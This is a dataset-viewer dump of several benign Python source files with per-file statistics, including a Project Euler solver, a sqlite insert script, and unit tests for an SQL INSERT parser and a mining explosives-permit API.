 C -1.22556 2.36585 -4.34594
 C -1.76286 -3.55361 3.55361
 C -2.76040 -2.76040 2.76040
 C -2.36585 -4.34594 1.22556
 C -1.77090 -3.60803 0.03068
 C -2.68020 -2.68020 -0.75831
 C -3.55361 -3.55361 1.76286
 C -4.34594 -2.36585 1.22556
 C -2.31413 -4.24517 -2.31413
 C -1.72725 -3.49086 -3.49086
 C -2.31413 -2.31413 -4.24517
 C -3.49086 -3.49086 -1.72725
 C -4.24517 -2.31413 -2.31413
 C -2.36585 -1.22556 4.34594
 C -1.77090 -0.03068 3.60803
 C -2.68020 0.75831 2.68020
 C -3.55361 -1.76286 3.55361
 C -4.34594 -1.22556 2.36585
 C -1.76728 -1.76728 1.76728
 C -2.68504 -0.85234 0.85234
 C -1.77542 -0.00000 0.00000
 C -2.68504 0.85234 -0.85234
 C -3.60803 -0.03068 1.77090
 C -4.37229 1.17118 1.17118
 C -3.60803 -1.77090 0.03068
 C -4.37229 -1.17118 -1.17118
 C -1.73610 -1.73610 -1.73610
 C -2.68020 -0.75831 -2.68020
 C -1.77090 0.03068 -3.60803
 C -2.36585 1.22556 -4.34594
 C -3.60803 0.03068 -1.77090
 C -4.34594 1.22556 -2.36585
 C -3.49086 -1.72725 -3.49086
 C -2.31413 2.31413 4.24517
 C -1.72725 3.49086 3.49086
 C -2.31413 4.24517 2.31413
 C -3.49086 1.72725 3.49086
 C -4.24517 2.31413 2.31413
 C -1.73610 1.73610 1.73610
 C -2.68020 2.68020 0.75831
 C -1.77090 3.60803 -0.03068
 C -2.36585 4.34594 -1.22556
 C -3.49086 3.49086 1.72725
 C -3.60803 1.77090 -0.03068
 C -4.34594 2.36585 -1.22556
 C -1.76728 1.76728 -1.76728
 C -2.76040 2.76040 -2.76040
 C -1.76286 3.55361 -3.55361
 C -3.55361 3.55361 -1.76286
 C -3.55361 1.76286 -3.55361
 """)
| 53.493333
| 60
| 0.353315
| 1,023
| 8,024
| 2.768328
| 0.053763
| 0.029661
| 0.019774
| 0.033898
| 0.952684
| 0.952684
| 0.952684
| 0.946328
| 0.753531
| 0.388065
| 0
| 0.731352
| 0.563933
| 8,024
| 149
| 61
| 53.852349
| 0.078022
| 0.012587
| 0
| 0
| 0
| 0
| 0.989371
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006849
| true
| 0
| 0.006849
| 0
| 0.020548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0697d1f381bd764fb5e54bfad843a1ed0e011e21
| 158
|
py
|
Python
|
elliot/recommender/knn/__init__.py
|
gategill/elliot
|
113763ba6d595976e14ead2e3d460d9705cd882e
|
[
"Apache-2.0"
] | 175
|
2021-03-04T15:46:25.000Z
|
2022-03-31T05:56:58.000Z
|
elliot/recommender/knn/__init__.py
|
gategill/elliot
|
113763ba6d595976e14ead2e3d460d9705cd882e
|
[
"Apache-2.0"
] | 15
|
2021-03-06T17:53:56.000Z
|
2022-03-24T17:02:07.000Z
|
elliot/recommender/knn/__init__.py
|
gategill/elliot
|
113763ba6d595976e14ead2e3d460d9705cd882e
|
[
"Apache-2.0"
] | 39
|
2021-03-04T15:46:26.000Z
|
2022-03-09T15:37:12.000Z
|
from .item_knn import ItemKNN
from .user_knn import UserKNN
from .attribute_item_knn import AttributeItemKNN
from .attribute_user_knn import AttributeUserKNN
| 31.6
| 48
| 0.873418
| 22
| 158
| 6
| 0.454545
| 0.272727
| 0.19697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101266
| 158
| 4
| 49
| 39.5
| 0.929577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
88cbff563a69c6dfadf5f2014eebb55434e49247
| 47
|
py
|
Python
|
src/lib/multiprocessing/__init__.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/multiprocessing/__init__.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/multiprocessing/__init__.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
# Skulpt stdlib stub: multiprocessing is unsupported in the browser runtime,
# so importing it raises the standardized "module not yet implemented" failure.
import _sk_fail; _sk_fail._("multiprocessing")
| 23.5
| 46
| 0.808511
| 6
| 47
| 5.5
| 0.666667
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06383
| 47
| 1
| 47
| 47
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.319149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
88ea27c6189210526a984a3ed1f41aa17177f141
| 74
|
py
|
Python
|
testchild.py
|
Saira55/test2
|
7e85e8d188b1ab83bbe9bd768671ab6304cb0f6e
|
[
"Apache-2.0"
] | null | null | null |
testchild.py
|
Saira55/test2
|
7e85e8d188b1ab83bbe9bd768671ab6304cb0f6e
|
[
"Apache-2.0"
] | 1
|
2021-10-15T11:17:30.000Z
|
2021-10-15T11:17:30.000Z
|
testchild.py
|
Saira55/test2
|
7e85e8d188b1ab83bbe9bd768671ab6304cb0f6e
|
[
"Apache-2.0"
] | null | null | null |
# Demo file added on the child branch (used to exercise git branching).
print ("Inside the child branch")
| 24.666667
| 39
| 0.743243
| 12
| 74
| 4.583333
| 0.75
| 0.290909
| 0.509091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175676
| 74
| 2
| 40
| 37
| 0.901639
| 0.486486
| 0
| 0
| 0
| 0
| 0.657143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
cca141604aef071be5496f03c2ed6d04101ce735
| 1,858
|
py
|
Python
|
p30-39/p38.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | 1
|
2015-10-11T15:53:00.000Z
|
2015-10-11T15:53:00.000Z
|
p30-39/p38.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | null | null | null |
p30-39/p38.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | null | null | null |
from array import *
def ispan(n):
    """Return 1 if n's digits are 1-9 pandigital (each of 1..9 exactly once,
    no repeats), else 0.

    Fixes: `n / 10` (true division on Python 3) -> `n // 10`, and
    `xrange` -> `range`; both changes are behavior-identical on Python 2
    and make the function correct on Python 3 as well.
    """
    digs = [0] * 10
    while n > 0:
        d = n % 10
        if digs[d]:
            # repeated digit -> not pandigital
            return 0
        digs[d] = 1
        n = n // 10
    for i in range(1, 10):
        if digs[i] == 0:
            return 0
    return 1
def LogPlusOne(n):
    """Number of decimal digits of n (0 when n < 1)."""
    digits = 0
    while 10 ** digits <= n:
        digits += 1
    return digits
# Project Euler 38: largest 1-9 pandigital formed by concatenating
# i*1, i*2, ..., i*k for some i and k > 1.  (Python 2 source: print
# statements and xrange.)  To reach exactly 9 digits the base i must have
# a leading 9, hence the four hand-unrolled ranges below.
currmax = 0
for i in xrange(9,10):
    cand = 2
    num = i
    NumOfDigits = LogPlusOne(num)
    # Concatenate i*cand onto num until at least 9 digits are assembled.
    while NumOfDigits < 9:
        num = (num * (10**LogPlusOne(i * cand))) + (i * cand)
        NumOfDigits = LogPlusOne(num)
        cand = cand + 1
    if NumOfDigits > 9:
        # overshot 9 digits -> cannot be 1-9 pandigital
        continue
    if ispan(num):
        if num > currmax:
            currmax = num
            print i, num
for i in xrange(90,100):
    cand = 2
    num = i
    NumOfDigits = LogPlusOne(num)
    while NumOfDigits < 9:
        num = (num * (10**LogPlusOne(i * cand))) + (i * cand)
        NumOfDigits = LogPlusOne(num)
        cand = cand + 1
    if NumOfDigits > 9:
        continue
    if ispan(num):
        if num > currmax:
            currmax = num
            print i, num
for i in xrange(900,1000):
    cand = 2
    num = i
    NumOfDigits = LogPlusOne(num)
    while NumOfDigits < 9:
        num = (num * (10**LogPlusOne(i * cand))) + (i * cand)
        NumOfDigits = LogPlusOne(num)
        cand = cand + 1
    if NumOfDigits > 9:
        continue
    if ispan(num):
        if num > currmax:
            currmax = num
            print i, num
for i in xrange(9000,10000):
    cand = 2
    num = i
    NumOfDigits = LogPlusOne(num)
    while NumOfDigits < 9:
        num = (num * (10**LogPlusOne(i * cand))) + (i * cand)
        NumOfDigits = LogPlusOne(num)
        cand = cand + 1
    if NumOfDigits > 9:
        continue
    if ispan(num):
        if num > currmax:
            currmax = num
            print i, num
print "max found: ", currmax
| 22.658537
| 61
| 0.502691
| 239
| 1,858
| 3.90795
| 0.142259
| 0.179872
| 0.205567
| 0.06424
| 0.783726
| 0.783726
| 0.783726
| 0.783726
| 0.783726
| 0.783726
| 0
| 0.062335
| 0.386975
| 1,858
| 81
| 62
| 22.938272
| 0.757682
| 0
| 0
| 0.72
| 0
| 0
| 0.00592
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013333
| null | null | 0.066667
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ccd5021b70ece591eca647382ee9fdc2d58b0344
| 1,141
|
py
|
Python
|
Base de Datos/Ejemplo/escritura_2.py
|
FR98/quinto-compu
|
ea62c400bb41fdd860b85ba889ce5b6393cb89e2
|
[
"MIT"
] | null | null | null |
Base de Datos/Ejemplo/escritura_2.py
|
FR98/quinto-compu
|
ea62c400bb41fdd860b85ba889ce5b6393cb89e2
|
[
"MIT"
] | null | null | null |
Base de Datos/Ejemplo/escritura_2.py
|
FR98/quinto-compu
|
ea62c400bb41fdd860b85ba889ce5b6393cb89e2
|
[
"MIT"
] | null | null | null |
import sqlite3

# Seed rows for the Persona table: (familia_id, nombre, apellido, edad).
PERSONAS = [
    (10, 'Willi', 'Rosal', 17),
    (20, 'Karen', 'Caballeros', 16),
    (10, 'Emanuel', 'Rosal', 15),
    (10, 'David', 'Rosal', 14),
    (10, 'Pablo', 'Rosal', 12),
    (1, 'Willi', 'Rosal', 17),
    (2, 'Karen', 'Caballeros', 16),
    (1, 'Emanuel', 'Rosal', 15),
    (1, 'David', 'Rosal', 14),
    (1, 'Pablo', 'Rosal', 12),
]

conn = sqlite3.connect('personas.db')
try:
    # Parameterized executemany replaces ten copy-pasted literal INSERTs.
    conn.executemany(
        "INSERT INTO Persona(familia_id, nombre, apellido, edad) VALUES(?, ?, ?, ?)",
        PERSONAS,
    )
    conn.commit()
finally:
    # Close the connection even if the INSERT fails (e.g. table missing).
    conn.close()
| 67.117647
| 109
| 0.726556
| 161
| 1,141
| 5.086957
| 0.21118
| 0.13431
| 0.20757
| 0.25641
| 0.893773
| 0.893773
| 0.893773
| 0.893773
| 0.893773
| 0.893773
| 0
| 0.035853
| 0.09553
| 1,141
| 17
| 110
| 67.117647
| 0.757752
| 0
| 0
| 0
| 0
| 0.714286
| 0.788091
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
aea7e8f0e2b280ab0d344627c699c9ad17fa4df3
| 2,123
|
py
|
Python
|
tests/formats/mysql/file_reader/test_insert_parser.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 10
|
2018-04-09T08:39:42.000Z
|
2022-03-14T15:36:05.000Z
|
tests/formats/mysql/file_reader/test_insert_parser.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 14
|
2018-05-02T11:14:08.000Z
|
2022-01-15T18:48:54.000Z
|
tests/formats/mysql/file_reader/test_insert_parser.py
|
cmancone/mygrations
|
30d1d568ca7d6c38dbc5211834dd2d04c0bcf078
|
[
"MIT"
] | 5
|
2018-07-18T02:20:48.000Z
|
2022-02-19T09:32:07.000Z
|
import unittest
from mygrations.formats.mysql.file_reader.insert_parser import insert_parser
class test_insert_parser(unittest.TestCase):
    """Tests for insert_parser: single VALUES group, multiple groups, and
    recovery from a missing comma between groups.

    Fix: the deprecated `assertEquals` alias (removed in Python 3.12) is
    replaced with `assertEqual` throughout.
    """

    def test_simple(self):
        parser = insert_parser()
        returned = parser.parse("INSERT INTO test_table (`col1`,`col2`) VALUES ('val','val2');")
        # we should have matched and consumed all input
        self.assertTrue(parser.matched)
        self.assertEqual('', returned)
        # we should have lots of data now
        self.assertEqual('test_table', parser.table)
        self.assertEqual(['col1', 'col2'], parser.columns)
        self.assertEqual([['val', 'val2']], parser.raw_rows)
        self.assertTrue(parser.has_semicolon)
        self.assertEqual([], parser.errors)

    def test_multiple_values(self):
        parser = insert_parser()
        returned = parser.parse("INSERT INTO test_table (`col1`,`col2`) VALUES ('val','val2'),('val3','val4')")
        # we should have matched and consumed all input
        self.assertTrue(parser.matched)
        self.assertEqual('', returned)
        # both VALUES groups parsed; statement had no trailing semicolon
        self.assertEqual('test_table', parser.table)
        self.assertEqual(['col1', 'col2'], parser.columns)
        self.assertEqual([['val', 'val2'], ['val3', 'val4']], parser.raw_rows)
        self.assertFalse(parser.has_semicolon)
        self.assertEqual([], parser.errors)

    def test_missing_comma(self):
        parser = insert_parser()
        returned = parser.parse("INSERT INTO test_table (`col1`,`col2`) VALUES ('val','val2')('val3','val4')")
        # missing comma is tolerated: both groups parse, but a warning is recorded
        self.assertTrue(parser.matched)
        self.assertEqual('', returned)
        self.assertEqual('test_table', parser.table)
        self.assertEqual(['col1', 'col2'], parser.columns)
        self.assertEqual([['val', 'val2'], ['val3', 'val4']], parser.raw_rows)
        self.assertFalse(parser.has_semicolon)
        self.assertEqual(1, len(parser.warnings))
| 36.603448
| 111
| 0.643429
| 244
| 2,123
| 5.495902
| 0.213115
| 0.178971
| 0.080537
| 0.085011
| 0.850112
| 0.850112
| 0.850112
| 0.850112
| 0.850112
| 0.796421
| 0
| 0.016314
| 0.220443
| 2,123
| 57
| 112
| 37.245614
| 0.793958
| 0.130947
| 0
| 0.636364
| 0
| 0
| 0.165123
| 0.032153
| 0
| 0
| 0
| 0
| 0.636364
| 1
| 0.090909
| false
| 0
| 0.060606
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aea90d1f345dd0af0fa247487e6e127128f22aef
| 5,431
|
py
|
Python
|
services/core-api/tests/mines/explosives_permit/resources/test_explosives_permit_list_resource.py
|
bcgov/mds
|
6c427a66a5edb4196222607291adef8fd6677038
|
[
"Apache-2.0"
] | 25
|
2018-07-09T19:04:37.000Z
|
2022-03-15T17:27:10.000Z
|
services/core-api/tests/mines/explosives_permit/resources/test_explosives_permit_list_resource.py
|
areyeslo/mds
|
e8c38e593e09b78e2a57009c0d003d6c4bfa32e6
|
[
"Apache-2.0"
] | 983
|
2018-04-25T20:08:07.000Z
|
2022-03-31T21:45:20.000Z
|
services/core-api/tests/mines/explosives_permit/resources/test_explosives_permit_list_resource.py
|
areyeslo/mds
|
e8c38e593e09b78e2a57009c0d003d6c4bfa32e6
|
[
"Apache-2.0"
] | 58
|
2018-05-15T22:35:50.000Z
|
2021-11-29T19:40:52.000Z
|
import json
from tests.factories import ExplosivesPermitFactory, MinePartyAppointmentFactory, create_mine_and_permit
def test_get_explosives_permit_by_mine_guid(test_client, db_session, auth_headers):
    """GET /mines/<guid>/explosives-permits returns the mine's one permit."""
    permit_record = ExplosivesPermitFactory()
    response = test_client.get(
        f'/mines/{permit_record.mine_guid}/explosives-permits',
        headers=auth_headers['full_auth_header'])
    body = json.loads(response.data.decode())
    # a 200 with exactly the single seeded permit in the record list
    assert response.status_code == 200, response.response
    assert len(body['records']) == 1
def test_post_explosives_permit_application(test_client, db_session, auth_headers):
    """POSTing a Core-originated application creates a permit in the
    received ('REC') state with no issued-permit fields populated.

    Fix: singleton comparisons now use ``is`` / ``is not`` per PEP 8
    (``!= None`` -> ``is not None``, ``== None`` -> ``is None``,
    ``== False`` -> ``is False``).
    """
    mine, permit = create_mine_and_permit()
    mine_manager = MinePartyAppointmentFactory(mine=mine)
    permittee = MinePartyAppointmentFactory(mine=mine)
    data = {
        'originating_system': 'Core',
        'permit_guid': str(permit.permit_guid),
        'mine_manager_mine_party_appt_id': mine_manager.mine_party_appt_id,
        'permittee_mine_party_appt_id': permittee.mine_party_appt_id,
        'application_date': '2021-07-12',
        'description': 'Other Information.',
        'latitude': '54',
        'longitude': '40',
        'explosive_magazines': [{
            'type_no': '1',
            'tag_no': '1',
            'construction': '1',
            'quantity': '1',
            'latitude': '1',
            'longitude': '1',
            'distance_road': '1',
            'distance_dwelling': '1',
            'length': '1',
            'width': '1',
            'height': '1'
        }],
        'detonator_magazines': [{
            'type_no': '1',
            'tag_no': '1',
            'construction': '1',
            'quantity': '1',
            'longitude': '1',
            'latitude': '1',
            'detonator_type': '1',
            'distance_road': '1',
            'distance_dwelling': '1',
            'width': '1',
            'height': '1',
            'length': '1'
        }]
    }
    post_resp = test_client.post(
        f'/mines/{mine.mine_guid}/explosives-permits',
        json=data,
        headers=auth_headers['full_auth_header'])
    assert post_resp.status_code == 201
    assert len(mine.explosives_permits) == 1
    post_data = json.loads(post_resp.data.decode())
    assert post_data['mine_guid'] == str(mine.mine_guid)
    assert post_data['permit_guid'] == data['permit_guid']
    # a new Core application starts in the received state
    assert post_data['application_status'] == 'REC'
    assert post_data['application_number'] is not None
    assert post_data['received_timestamp'] is not None
    assert post_data['is_closed'] is False
    # issued-permit fields stay empty until the application is approved
    assert post_data['permit_number'] is None
    assert post_data['issue_date'] is None
    assert post_data['expiry_date'] is None
    assert len(post_data['explosive_magazines']) == len(data['explosive_magazines'])
    assert len(post_data['detonator_magazines']) == len(data['detonator_magazines'])
def test_post_explosives_permit_historical(test_client, db_session, auth_headers):
    """POSTing an MMS-originated (historical) permit, with permit number and
    issue/expiry dates supplied, creates it directly in the approved ('APP')
    state with no application number or received timestamp.

    Fix: singleton comparisons now use ``is`` per PEP 8
    (``== None`` -> ``is None``).
    """
    mine, permit = create_mine_and_permit()
    mine_manager = MinePartyAppointmentFactory(mine=mine)
    permittee = MinePartyAppointmentFactory(mine=mine)
    data = {
        'originating_system': 'MMS',
        'permit_guid': str(permit.permit_guid),
        'mine_manager_mine_party_appt_id': mine_manager.mine_party_appt_id,
        'permittee_mine_party_appt_id': permittee.mine_party_appt_id,
        'application_date': '2000-07-12',
        'description': 'Other Information.',
        'latitude': '54',
        'longitude': '40',
        'explosive_magazines': [{
            'type_no': '1',
            'tag_no': '1',
            'construction': '1',
            'quantity': '1',
            'latitude': '1',
            'longitude': '1',
            'distance_road': '1',
            'distance_dwelling': '1',
            'length': '1',
            'width': '1',
            'height': '1'
        }],
        'detonator_magazines': [{
            'type_no': '1',
            'tag_no': '1',
            'construction': '1',
            'quantity': '1',
            'longitude': '1',
            'latitude': '1',
            'detonator_type': '1',
            'distance_road': '1',
            'distance_dwelling': '1',
            'width': '1',
            'height': '1',
            'length': '1'
        }],
        # historical permits arrive already issued
        'permit_number': 'BC-1042',
        'issue_date': '2001-07-12',
        'expiry_date': '2001-07-12',
    }
    post_resp = test_client.post(
        f'/mines/{mine.mine_guid}/explosives-permits',
        json=data,
        headers=auth_headers['full_auth_header'])
    assert post_resp.status_code == 201
    assert len(mine.explosives_permits) == 1
    post_data = json.loads(post_resp.data.decode())
    # historical records skip the application phase and land as approved
    assert post_data['application_status'] == 'APP'
    assert post_data['mine_guid'] == str(mine.mine_guid)
    assert post_data['permit_guid'] == data['permit_guid']
    assert post_data['originating_system'] == data['originating_system']
    assert post_data['permit_number'] == data['permit_number']
    assert post_data['application_number'] is None
    assert post_data['received_timestamp'] is None
    assert len(post_data['explosive_magazines']) == len(data['explosive_magazines'])
    assert len(post_data['detonator_magazines']) == len(data['detonator_magazines'])
| 33.115854
| 104
| 0.582766
| 575
| 5,431
| 5.182609
| 0.161739
| 0.05906
| 0.075168
| 0.040268
| 0.815436
| 0.762416
| 0.741611
| 0.741611
| 0.741611
| 0.741611
| 0
| 0.025928
| 0.27564
| 5,431
| 163
| 105
| 33.319018
| 0.731571
| 0
| 0
| 0.77027
| 0
| 0
| 0.287424
| 0.047321
| 0
| 0
| 0
| 0
| 0.175676
| 1
| 0.02027
| false
| 0
| 0.013514
| 0
| 0.033784
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aeaa7dcd45ad9fd3fae24f3f9973e9c9dbe92a5b
| 37
|
py
|
Python
|
tNLM/__init__.py
|
kristianeschenburg/tNLM
|
587fb6c9539493c6de691d28adbd6bab7f93274d
|
[
"MIT"
] | 3
|
2019-04-05T08:37:01.000Z
|
2020-06-25T15:21:49.000Z
|
tNLM/__init__.py
|
kristianeschenburg/tNLM
|
587fb6c9539493c6de691d28adbd6bab7f93274d
|
[
"MIT"
] | null | null | null |
tNLM/__init__.py
|
kristianeschenburg/tNLM
|
587fb6c9539493c6de691d28adbd6bab7f93274d
|
[
"MIT"
] | 1
|
2021-02-20T03:51:59.000Z
|
2021-02-20T03:51:59.000Z
|
from .temporalNonLocalMeans import *
| 18.5
| 36
| 0.837838
| 3
| 37
| 10.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.